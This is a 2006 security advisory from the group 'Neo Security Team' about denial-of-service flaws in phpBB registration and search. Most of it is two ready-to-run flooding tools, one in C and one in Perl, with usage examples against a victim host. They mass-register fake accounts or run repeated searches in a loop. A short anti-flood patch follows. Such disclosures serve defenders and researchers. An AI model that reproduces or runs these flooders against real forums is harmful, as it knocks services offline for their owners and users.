/* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® - Advisory #18 - 03/03/06 -------------------------------------------------------- Program: phpBB Homepage: http://www.phpbb.com Vulnerable Versions: All phpBB versions Risk: High Risk!! Impact: Multiple DoS Vulnerabilities. -==phpBB Multiple DoS Vulnerabilities ==- --------------------------------------------------------- - Description --------------------------------------------------------- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. - Tested --------------------------------------------------------- many forums - Explotation --------------------------------------------------------- profile.php << By registering as many users as you can. The registration has to ve deactived the security code image. search.php << by searching in a way that the db couln't observe it. This vulnerability has discovered in the version 2.0.15 but it works in all versions if the security image code is not activ ated. The exploits used were published some months ago, you can check it out in www.neosecurityteam.net - Exploit --------------------------------------------------------- [C Source] /* Name: NsT-phpBBDoS Copyright: NeoSecurityteam Author: HaCkZaTaN Date: 19/06/05 Description: xD You must figure out the problem xD root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] NeoSecurityTeam [+] Dos has begun....[+] [*] Use: ./NsT-phpBBDoS [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com [+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+] [+] NeoSecurityTeam [+] [+] Dos has begun....[+] ................................. root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created" Let see how many users I have created root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE MACHTYPE=i486-slackware-linux-gnu root@NeoSecurity:/home/hackzatan# */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #ifdef WIN32 #include <winsock2.h> #pragma comment(lib, "ws2_32") #pragma pack(1) #define WIN32_LEAN_AND_MEAN #else #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #endif #define __USE_GNU #define _XOPEN_SOURCE int Connection(char *, int); void Write_In(int , char *, char *, char *, int); char Use(char *); int main(int argc, char *argv[]) { int sock, x = 0; char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3]; puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]"); puts("[+] NeoSecurityTeam [+]"); puts("[+] Dos has begun....[+] "); fflush(stdout); if(argc != 4) Use(argv[0]); while(1) { sock = Connection(Host,80); Write_In(sock, Path, Pro_Sea, Host, x); #ifndef WIN32 shutdown(sock, SHUT_WR); close(sock); #else closesocket(sock); WSACleanup(); #endif Pro_Sea = argv[2]; x++; } //I don't think that it will get here =) return 0; } int Connection(char *Host, int Port) { #ifndef WIN32 #define SOCKET int #else int error; WSADATA wsadata; error = WSAStartup(MAKEWORD(2, 2), &wsadata); if (error == SOCKET_ERROR) { perror("Could Not Start Up Winsock! "); return; } #endif SOCKET sockfd; struct sockaddr_in sin; struct in_addr *myaddr; struct hostent *h; if(Port <= 0 || Port > 65535) { puts("[-] Invalid Port Number "); fflush(stdout); exit(-1); } if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket() "); fflush (stdout); exit(-1); } if(isalpha(Host[0])) { if((h = gethostbyname(Host)) == NULL) { perror("gethostbyname() "); fflush (stdout); exit(-1); } } else { myaddr=(struct in_addr*)malloc(sizeof(struct in_addr)); myaddr->s_addr=inet_addr(Host); if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL) { perror("gethostbyaddr() "); fflush (stdout); exit(-1); } } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(Port); memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length); if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0) { perror("connect() "); exit (-1); } return sockfd; } void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x) { char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ); char NsT[] = "x4Ex65x6Fx53x65x63x75x72x69x74x79x54x65x61x6D"; char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 " "Accept: */* " "Accept-Language: en-us " "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " "Accept encoding: gzip,deflate " "Keep-Alive: 300 " "Proxy-Connection: keep-alive " "Content-Type: application/x-www-form-urlencoded " "Cache-Control: no-cache " "Pragma: no-cache "; char *Profile = ".net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=spanish&style=4&timezone=1&dateformat=l%2C+d+F+Y%2C+H%3Ai&mode=register&agreed=true&coppa=0&submit=Enviar "; char *Search = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200 "; if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=N1sT__%d&email=N1sT__%d%%40%s%s", x, x, NsT, Profile); else if(strcmp("search.php", Pro_Sea) == 0) { Pro_Sea = "search.php?mode=results"; sprintf(str1, "search_keywords=Nst_%d%s", x, Search); } else { puts("Sorry. Try making the right choice"); exit(-1); } sprintf(str2, "POST %s%s HTTP/1.1 " "Host: %s " "Referer: http://%s/ %s" "Content-Length: %d %s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1); write(sock, str2, strlen(str2)); write(1, ".", 1); fflush(stdout); } char Use(char *program) { fprintf(stderr,"[*] Use: %s ", program); fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com ", program); fflush(stdout); exit(-1); } /* @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ /* EOF */ ************************************************************************* [Perl Source] #!/usr/bin/perl ## Name: NsT-phpBBDoS (Perl Version) ## Copyright: Neo Security Team ## Author: HaCkZaTaN ## Ported: g30rg3_x ## Date: 20/06/05 ## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x ## A Simple phpBB Registration And Search DoS Flooder. ## ## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl ## [+] ## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN ## [+] ported to Perl By g30rg3_x ## [+] Neo Security Team ## [+] ## [+] Host |without http://www.| victimshost.com ## [+] Path |example. /phpBB2/ or /| /phpBB2/ ## [+] Flood Type |1=Registration 2=Search| 1 ## [+] .......................................................... ## [+] .......................................................... ## [+] .......................................................... ## [+] .............................................. ## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed ## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" use IO::Socket; ## Initialized X $x = 0; ## Flood Variables Provided By User print q( NsT-phpBBDoS v0.2 by HaCkZaTaN ported to Perl By g30rg3_x Neo Security Team ); print q(Host |without http://www.| ); $host = ; chop ($host); print q(Path |example. /phpBB2/ or /| ); $pth = ; chop ($pth); print q(Flood Type |1 = Registration, 2 = Search| ); $type = ; chop ($type); ## If Type Is Equals To 1 or Registration if($type == 1){ ## User Loop for 9999 loops (enough for Flood xDDDD) while($x != 9999) { ## Building User in base X $uname = "username=NsT__" . "$x"; ## Building User Mail in base X $umail = "&email=NsT__" . "$x"; ## Final String to Send $postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $! " unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums print $sock "POST $pth"."profile.php HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg "; print $sock "$postit "; close($sock); ## Print a "." for every loop syswrite STDOUT, "."; ## Increment X in One for every Loop $x++; } ## If Type Is Equals To 2 or Search } elsif ($type == 2){ ## User Search Loop for 9999 loops (enough for Flood xDDDD) while($x != 9999) { ## Final Search String to Send $postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die " The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $! " unless $sock; ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums print $sock "POST $pth"."search.php?mode=results HTTP/1.1 "; print $sock "Host: $host "; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "Accept-Encoding: gzip, deflate "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Connection: Keep-Alive "; print $sock "Cache-Control: no-cache "; print $sock "Content-Length: $lrg "; print $sock "$postit "; close($sock); ## Print a "." for every loop syswrite STDOUT, "."; ## Increment X in One for every Loop $x++; } }else{ ## STF??? What Do You Type die "Option not Allowed O_o??? "; } - Solutions -------------------------------------------------------- /* Patch by Paisterist. Put this code after the "// Get current date" line */ phpBB2/includes/usercp_register.php -usercp_register.php- ### $flood=time()-120; $query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where user_regdate>='" . $flood . "' order by user_regdate desc"); if($db->sql_numrows($query)!=0) { $row=$db->sql_fetchrow($query); $error=TRUE; $error_msg="Protección anti flood activada. Por favor espera " . $flood - $row['user_regdate'] . " segundos y manda los datos de vuelta."; } else { -usercp_register.php- =================================== /* Patch by Paisterist. Put this code after "// Define initial vars" */ phpBB2/search.php -search.php- if ($_GET['mode']=="results") { ############ $fp=fopen("time.txt", "r"); $flood=fgets($fp, 1000); if($flood>=time()-5) { message_die(GENERAL_MESSAGE, "Protección anti flood activada. Intenta unos segundos más tarde"); fclose($fp); exit(0); } else { $fp=fopen("time.txt", "w"); fwrite($fp, time()); fclose($fp); } ###### -search.php- - References -------------------------------------------------------- http://www.neosecurityteam.net/index.php?action=advisories&id=18 - Credits ------------------------------------------------- [C Exploit] by HaCkZaTaN [Perl Exploit] by g30rg3_x [Patch] by Paisterist [N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/ Got Questions? http://www.neosecurityteam.net/foro/ irc.fullnetwork.org #nst [NeoSecurity IRC] - Greets -------------------------------------------------------- Daemon21 LINUX erg0t uyx CrashCool Makoki KingMetal r3v3ng4ns T0wn3r All Internal Fear Staff Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!! @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ /* EOF */
